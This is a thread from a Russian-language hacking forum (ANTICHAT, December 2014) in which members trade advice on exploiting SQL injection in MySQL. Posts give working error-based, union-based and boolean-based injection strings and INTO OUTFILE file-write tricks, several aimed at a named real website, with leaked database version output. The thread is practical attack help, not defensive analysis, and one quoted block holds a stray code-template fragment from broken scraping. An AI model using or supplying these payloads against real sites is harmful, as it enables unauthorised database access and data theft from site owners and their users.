HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23971  
Старый 28.12.2014, 13:16
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от mazaxaka  
mazaxaka said:
странно. на 2х mysql 5.** ветки пишет что не поддерживается версией
может быть она просто выключена? по дефолту, обычно, вкл.

присутствует в 5.7 и ниже http://dev.mysql.com/doc/refman/5.7/en/load-data.html
 
Ответить с цитированием

  #23972  
Старый 30.12.2014, 00:04
x_Lex
Участник форума
Регистрация: 08.01.2005
Сообщений: 178
Провел на форуме:
2186077

Репутация: 438
По умолчанию

ребята кто знает как определить имя таблицы в sql инъекции error-based

ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema

Код:
Code:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))
но продвинутся дальше не получается не знаю префикса названия таблиц

вопрос как вызвать ошибку с названием таблицы в ней?
 
Ответить с цитированием

  #23973  
Старый 30.12.2014, 00:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
15642

Репутация: 6
По умолчанию

Цитата:
Сообщение от x_Lex  
x_Lex said:
ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , найдена инъекция
Код:
Code:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))
но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней
?
1. select table_name form information_schema.tables limit 1

2. За сколько акк купили
 
Ответить с цитированием

  #23974  
Старый 30.12.2014, 00:17
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

select table_name from information_schema.tables limit 1,1 вместо select version()

с такими вопросами вам лучше сначала почитать статьи
 
Ответить с цитированием

  #23975  
Старый 30.12.2014, 04:14
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Цитата:
Сообщение от GroM88  
GroM88 said:
я пробовал уже) лил в папки которые доступны для записи... ноль эффекта.
прочитал php.ini
magic_quotes=off
так что кавычки врятли тут роль играют)
Ну во первых, как советуют выкинь Хавидж и сделай вручную.

К тому же переведи в HEX колонку к виду 0x0000000 и

SELECT 0x0000 INTO OUTFILE /path

К тому-же, tmp это который /tmp в корне сервера или в локации вебкорня? Тот что в корне сервера, на самом деле для всех должен быть доступен на запись, а вот любые, даже кешевые и тп директории внутри вебкорня для отличных от пользователя под которым работает php(etc) могут иметь права строго ограничивающие доступ
 
Ответить с цитированием

  #23976  
Старый 31.12.2014, 03:30
x_Lex
Участник форума
Регистрация: 08.01.2005
Сообщений: 178
Провел на форуме:
2186077

Репутация: 438
По умолчанию

Цитата:
Сообщение от UXOR  
UXOR said:
Цитата:
Сообщение от x_Lex  
x_Lex said:
ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema
Код:
Code:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))
но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней
?
1. select table_name form information_schema.tables limit 1
2. За сколько акк купили
" if author else f"
Цитата:
UXOR said:
Цитата:
Сообщение от x_Lex  
x_Lex said:
ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema
Код:
Code:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))
но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней
?
1. select table_name form information_schema.tables limit 1
2. За сколько акк купили
Цитата:
Сообщение от faza02  
faza02 said:
select table_name from information_schema.tables limit 1,1 вместо select version()
с такими вопросами вам лучше сначала почитать статьи
а блин забыл упомянуть что нет доступа с базе information_schema
 
Ответить с цитированием

  #23977  
Старый 31.12.2014, 09:04
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:
Нестандартная скула - результат пост-запроса. В общем, как дальше быть? Или ничего нельзя сделать?
Код:
Code:
http:// www.f    avorite-picture.     com/pictures/search/ffffff.html
=>
Код:
Code:
http:// www.f    avorite-picture.     com/pictures/search/ffffff'.html
Какого пост-запроса?

Стандартгая ситуация у Вас, вектор - error based:

Цитата:
Сообщение от None  
http://www.favorite-picture.com/pictures/search/ffffff'*(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a)*'.html
 
Ответить с цитированием

  #23978  
Старый 31.12.2014, 09:56
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:
Нестандартная скула - результат пост-запроса. В общем, как дальше быть? Или ничего нельзя сделать?
Код:
Code:
http:// www.f    avorite-picture.     com/pictures/search/ffffff.html
=>
Код:
Code:
http:// www.f    avorite-picture.     com/pictures/search/ffffff'.html
+ к посту YaBtr

Заменяем пробелы на %20

Union Based

http://www.favorite-picture.com/pictures/search/ffffff')and(1)=2%20order%20by%203%23.html

http://www.favorite-picture.com/pictures/search/miss')and(1)=1%20union%20select%20@@version,222%23 .html

Boolean Based

http://www.favorite-picture.com/pictures/search/ffffff')and(1='1.html

http://www.favorite-picture.com/pictures/search/ffffff')and(1)=1%23.html

Error Based Classic

http://www.favorite-picture.com/pictures/search/miss')or%20(select%20count(*)%20from%20(select%201 %20union%20select%202%20union%20select%203)x%20gro up%20by%20concat(version(),floor(rand(0)*2)))%23.h tml

Duplicate entry '5.5.38-0+wheezy11'
 
Ответить с цитированием

  #23979  
Старый 31.12.2014, 15:21
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от x_Lex  
x_Lex said:
а блин забыл упомянуть что нет доступа с базе information_schema
вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой
 
Ответить с цитированием

  #23980  
Старый 31.12.2014, 21:51
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Цитата:
Сообщение от x_Lex  
x_Lex said:
а блин забыл упомянуть что нет доступа с базе information_schema
Во первых попробовать так: `information_schema`.xxx.

Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ